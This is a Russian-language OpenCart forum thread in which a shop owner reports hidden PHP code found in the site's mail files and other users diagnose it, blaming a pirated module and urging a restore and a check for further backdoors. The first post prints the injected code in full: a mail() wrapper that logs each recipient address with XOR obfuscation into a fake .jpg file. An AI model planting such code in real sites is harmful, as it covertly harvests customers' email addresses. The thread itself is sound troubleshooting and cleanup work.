Вирус или как?

[Leva888]

Приветствую,

 

Нашел у себя на сайте в system/library/mail.php и в admin/controller/sale/contact.php

вот такой спрятанный код, хотелось бы понять что это такое и откуда оно взялось.

<?php /* 62735f32d0da45a576376b71fcbafb50 */ function xmail () { $a=func_get_args(); file_put_contents('/home/domen/public_html/admin/controller/report/z3o.jpg', x($_SERVER['REQUEST_URI']. ' ' .$a[0]."\n"), FILE_APPEND); return mail($a[0],$a[1],$a[2], $a[3]);} function x($s) { $t=$s; $o = ''; for($i=0;$i<strlen($t);$i++){ $o .= $t{$i} ^ '0';} return $o;}?>

[Baco]

откройте файлик этот ( /home/domen/public_html/admin/controller/report/z3o.jpg ) через блокнот и покажите что в нём.

[Leva888]

Не получается кодом вставить. Пристегнул файл.

 

PS причем после удаления этого кода из указанных файлов скрипт отправки сообщений перестал работать:)

[ashap]

это вирус малевича))))

черный квадрат называется)

[ashap]

собирает емайлы покупателей

или запускает как раз таки вирусный файл

взялось откудато

либо старая версия опенкарта

либо фтп взломали

либо либо установили какото модуль который заменил системные файлы

 

лечение: перезалить на оригинальные файлы движка

[ashap]

вот аналогичный на друпале

http://www.drupal.ru/node/103942

[Baco]

Вы блокнотом откройте тот рисунок или поменяйте расшмрение с jpeg на txt и напишите сюда то, что содеожится внутри файла. 

[Leva888]

Что-то не подумал в тхт поменять:)

Объем видимо большой, не дает кодом вставить. Прикрепил тхт

z3o.txt

[Leva888]

По поводу откуда взялось.

Перед этим ставил вот этот модуль [Модуль предзаказа - ссылка на варезник]

Может быть оттуда?

 

И как этот код повлиял на то, что теперь у меня через форму не уходят заказы?

Змінено 1 жовтня 2014 користувачем AlexFisher
censored

[ashap]

По поводу откуда взялось.

Перед этим ставил вот этот модуль 

Может быть оттуда?

 

И как этот код повлиял на то, что теперь у меня через форму не уходят заказы?

ничего удивительного это варезник

продает чужие модули

[12strun]

Перед этим ставил вот этот модуль [Модуль предзаказа - ссылка на варезник]

Может быть оттуда?

 

И как этот код повлиял на то, что теперь у меня через форму не уходят заказы?

А вы почаще на варезах модули берите.... тогда у вас такая дыра в безопасности вашего сайта будет, к которую легко влетит средних размеров слон...

...а пока радуйтесь что так легко отделались... хотя это - еще не факт...

[Leva888]

уже восстановил из бэкапа.

Спасибо.

[Leva888]

Если я выложу сюда этот модуль, сможет его кто-нибудь почистить?

[AlexFisher]

Правила форума читайте. Например пункт 2.5

Нельзя его здесь выкладывать.

[12strun]

Если я выложу сюда этот модуль, сможет его кто-нибудь почистить?

Скорее вас почистят...) половина форума - разработчики, чьи модули, некоторые псевдо-Робин-Гуды сливают на варез....а такие крохоборы-холявщики как вы (простите - ничего личного), их там берут. А потом приходят на форум, где варез очень не любят и жалуются-просят об услугах.  И опять же - не в платном разделе...) т.е. - за спасибо.

[freelancer]

боюсь, что это не всё..

1. сколько ещё таких xmail в ваших файлах?

2. кто вызывает xmail ?

[snastik]

ТС, качай еще модули с вареза.

БОЛЬШЕ ЖЕСТИ!

[Leva888]

Вот разберешь их где варез, а где нет. Этот модуль хоть и небольших, но денег стоил, а на сайте у продавца не сказано что он варезник поганый.

 

В mail.php был вызов xmail, заменил его здоровым файлом

Змінено 3 жовтня 2014 користувачем Leva888

[freelancer]

я бы на вашем месте не смог спать спокойно.

1. помимо xmail может быть полно других функций

2. злоумышленник уже мог распихать свои бэкдоры по всему сайту

3. злоумышленник уже мог получить доступ к ftp, панели управления, биллингу

[ashap]

4. проник в ваш мозг)